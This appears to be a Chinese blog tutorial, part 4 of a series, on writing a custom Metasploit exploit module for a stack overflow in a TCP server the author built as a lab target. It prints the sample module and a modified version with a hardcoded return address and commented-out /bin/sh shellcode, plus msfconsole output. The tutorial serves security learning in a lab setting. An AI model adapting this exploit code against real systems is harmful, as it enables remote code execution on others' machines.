有了漏洞我们就可以进行攻击了。首先我们需要了解metasploit的exploit模块,具体可以看

http://www.offensive-security.com/metasploit-unleashed/Exploit_Development

metasploit本身功能非常强大,这里不多做介绍。

首先我们需要添加一个针对这个漏洞的exploit模块,

我们直接在样例上进行修改:

root@bt:~/.msf4/modules# mkdir exploits

root@bt:~/.msf4/modules# cd exploits

root@bt:~/.msf4/modules/exploits# mkdir linux

root@bt:~/.msf4/modules/exploits/linux# cp /pentest/exploits/framework/documentation/samples/modules/exploits/sample.rb  myvictim.rb

root@bt:~/.msf4/modules/exploits/linux# ls

myvictim.rb  myvictimserver.rb  proftp_sreplace.rb

然后查看myvictim.rb

##

# $Id: sample.rb 9212 2010-05-03 17:13:09Z jduck $

##

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

##

require 'msf/core'

module Msf

###

#

# This exploit sample shows how an exploit module could be written to exploit

# a bug in an arbitrary TCP server.

#

###

class Exploits::Sample < Msf::Exploit::Remote

        #

        # This exploit affects TCP servers, so we use the TCP client mixin.

        #

        include Exploit::Remote::Tcp

        def initialize(info = {})

                super(update_info(info,

                        'Name'           => 'Sample exploit',

                        'Description'    => %q{

                                        This exploit module illustrates how a vu

lnerability could be exploited

                                in an TCP server that has a parsing bug.

                        },

                        'Author'         => 'skape',

                        'Version'        => '$Revision: 9212 $',

                        'References'     =>

                                [

                                ],

                        'Payload'        =>

                                {

                                        'Space'    => 1000,

                                        'BadChars' => "\x00",

                                },

                        'Targets'        =>

                                [

                                        # Target 0: Windows All

                                        [

                                                'Windows Universal',

                                                {

                                                        'Platform' => 'win',

                                                        'Ret'      => 0x41424344

                                                }

                                        ],

                                ],

                        'DefaultTarget' => 0))

        end

        #

        # The sample exploit just indicates that the remote host is always

        # vulnerable.

        #

        def check

                return Exploit::CheckCode::Vulnerable

        end

        #

        # The exploit method connects to the remote service and sends 1024 A's

        # followed by the fake return address and then the payload.

        #

        def exploit

                connect

                print_status("Sending #{payload.encoded.length} byte payload..."

)

                # Build the buffer for transmission

                buf  = "A" * 1024

                buf += [ target.ret ].pack('V')

                buf += payload.encoded

                # Send it off

                sock.put(buf)

                sock.get

                handler

        end

end

end

然后我们需要把他添加进metasploit,运行reload_all

=[ metasploit v4.0.0-release [core:4.0 api:1.0]
+ -- --=[ 719 exploits - 361 auxiliary - 68 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
=[ svn r13462 updated 1208 days ago (2011.08.01)

Warning: This copy of the Metasploit Framework was last updated 1208 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306

msf > reload_all

msf > use exploit/linux/my
use exploit/linux/mysql/mysql_yassl_getname use exploit/linux/myvictimserver
use exploit/linux/mysql/mysql_yassl_hello
msf > use exploit/linux/my

这里并没有列出来我们刚刚添加的模块,说明模块有问题,必须修改,修改如下:

##

# $Id: myvictimserver.rb 9212 2014-11-03 17:13:09Z jduck $

##

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

##

require 'msf/core'

###

#

# This exploit sample shows how an exploit module could be written to exploit

# a bug in an arbitrary TCP server.

#

###

class Metasploit3 < Msf::Exploit::Remote

    Rank = GreatRanking

    #

    # This exploit affects TCP servers, so we use the TCP client mixin.

    #

    include Exploit::Remote::Tcp

    def initialize(info = {})

        super(update_info(info,

            'Name'           => 'MyVictimSever',

            'Description'    => %q{

                    This exploit module illustrates how a vulnerability could be exploited

                in an TCP server that has a stackoverflow bug.

            },

            'Author'         => 'bai',

            'Version'        => '$Revision: 9212 $',

            'References'     =>

                [

                ],

            'Payload'        =>

                {

                    'Space'    => 116, #

                    'BadChars' => "\x00",

                },

            'Targets'        =>

                [

                    # Target 0: Windows All

                    [

                        'MyVictimSever run on linux',

                        {

                            'Platform' => 'Linux',

                            'Ret'      =>  0xbffff4a4

                        }

                    ],

                ],

            'DefaultTarget' => 0))

    end

    #

    # The sample exploit just indicates that the remote host is always

    # vulnerable.

    #

    def check

        return Exploit::CheckCode::Vulnerable

    end

    #

    # The exploit method connects to the remote service and sends 1024 A's

    # followed by the fake return address and then the payload.

    #

    def exploit

        connect

        print_status("Sending #{payload.encoded.length} byte payload...")

        # Build the buffer for transmission

        buf="";

        #buf  = "\x90" * 15

        #buf+="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

        #buf+="\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

        #buf+="\x80\xe8\xdc\xff\xff\xff/bin/sh";

        buf+="\xa4\xf4\xff\xbf"

        buf += payload.encoded

        buf += [].fill( target.ret,0,100).pack('V*')

        # Send it off

        sock.put(buf)

        sock.get

        handler

    end

end

这时候,我们就可以找到这个模块了。

msf > use exploit/linux/my

use exploit/linux/mysql/mysql_yassl_getname  use exploit/linux/myvictim

use exploit/linux/mysql/mysql_yassl_hello    use exploit/linux/myvictimserver

msf > use exploit/linux/my

使用metasploit进行栈溢出攻击-4的更多相关文章

  1. 使用metasploit进行栈溢出攻击-1

    攻击是在bt5下面进行,目标程序是在ubuntu虚拟机上运行. 首先,需要搞明白什么是栈溢出攻击,详细内容请阅读 http://blog.csdn.net/cnctloveyu/article/det ...

  2. 使用metasploit进行栈溢出攻击-2

    基本的栈溢出搞明白了,真实攻击中一个很重要的问题是shellcode生成. 利用Metasploit提供的工具,可以方便的生成shellcode,然后可以使用第一篇中的代码进行验证. 先说一下如何生成 ...

  3. 使用metasploit进行栈溢出攻击-3

    有了shellcode,就可以进行攻击了,但是要有漏洞才行,真实世界中的漏洞很复杂,并且很难发现,因此我专门做一个漏洞来进行攻击. 具体来说就是做一个简单的tcp server,里面包含明显的栈溢出漏 ...

  4. 使用metasploit进行栈溢出攻击-5

    我们先尝试使用这个脚本进行攻击: msf > use exploit/linux/myvictim msf exploit(myvictim) > set payload linux/x8 ...

  5. [转]现代Linux系统上的栈溢出攻击

    1. 基本内容 这个教程试着向读者展示最基本的栈溢出攻击和现代Linux发行版中针对这种攻击的防御机制.为此我选择了最新版本的Ubuntu系统(12.10),因为它默认集成了几个安全防御机制,而且它也 ...

  6. Linux下基本栈溢出攻击【转】

    转自:http://blog.csdn.net/wangxiaolong_china/article/details/6844415 版权声明:本文为博主原创文章,未经博主允许不得转载. 目录(?)[ ...

  7. [翻译]现代Linux系统上的栈溢出攻击【转】

    转自:http://www.codeweblog.com/%E7%BF%BB%E8%AF%91-%E7%8E%B0%E4%BB%A3linux%E7%B3%BB%E7%BB%9F%E4%B8%8A%E ...

  8. [转]初探Metasploit的自动攻击

    1. 科普Metasploit   以前只是个Back Track操作系统(简称:BT) 下的攻击框架,自成继承了后攻击渗透模块,隐隐有成为攻击平台的趋势. 我们都戏称它为美少妇,很简单,msf. 它 ...

  9. 实验三 kali下metasploit的漏洞攻击实践

    一.实验内容 1.使用kali进行靶机的漏洞扫描,利用metasploit选择其中的一个漏洞进行攻击,并获取权限. 2.分析攻击的原理以及获取了什么样的权限. 二.实验要求 1.熟悉kali原理和使用 ...

随机推荐

  1. poj 2262 Goldbach's Conjecture——筛质数(水!)

    题目:http://poj.org/problem?id=2262 大水题的筛质数. #include<iostream> #include<cstdio> #include& ...

  2. 导入镜像后,容器内httpd起不来

    导入镜像后发现bash进程为1 与之前apache启动的进程冲突了 解决办法:删除apache进程号,通过apachectl重启apache进程

  3. Xcode工具特性

    1.注释 #pragma mark 注释说明#pragma mark - 分类/分组注释说明 2.自定义代码块. 3.多文本编辑框 View>>Assistant Editor

  4. (转)NHibernate之Generator主键生成方式

    本文转载自:http://www.cnblogs.com/lemon-love/archive/2010/03/10/1683058.html (1) assigned主键由外部程序负责生成,无需NH ...

  5. 机器学习:集成学习(集成学习思想、scikit-learn 中的集成分类器)

    一.集成学习的思想 集成学习的思路:一个问题(如分类问题),让多种算法参与预测(如下图中的算法都可以解决分类问题),在多个预测结果中,选择出现最多的预测类别做为该样本的最终预测类别: 生活中的集成思维 ...

  6. 机器学习:模型泛化(LASSO 回归)

    一.基础理解 LASSO 回归(Least Absolute Shrinkage and Selection Operator Regression)是模型正则化的一定方式: 功能:与岭回归一样,解决 ...

  7. 机器学习:多项式回归(scikit-learn中的多项式回归和 Pipeline)

    一.scikit-learn 中的多项式回归 1)实例过程 模拟数据 import numpy as np import matplotlib.pyplot as plt x = np.random. ...

  8. Java-API:java.text.SimpleDateFormat

    ylbtech-Java-API:java.text.SimpleDateFormat 1.返回顶部   2.返回顶部   3.返回顶部   4.返回顶部   5.返回顶部 0. https://do ...

  9. src路径

  10. CDM中遍历域及其约束条件、取值范围、引用它的项目

    Option   ExplicitValidationMode   =   TrueInteractiveMode =   im_BatchDim   mdl   '当前model'获取当前活动mod ...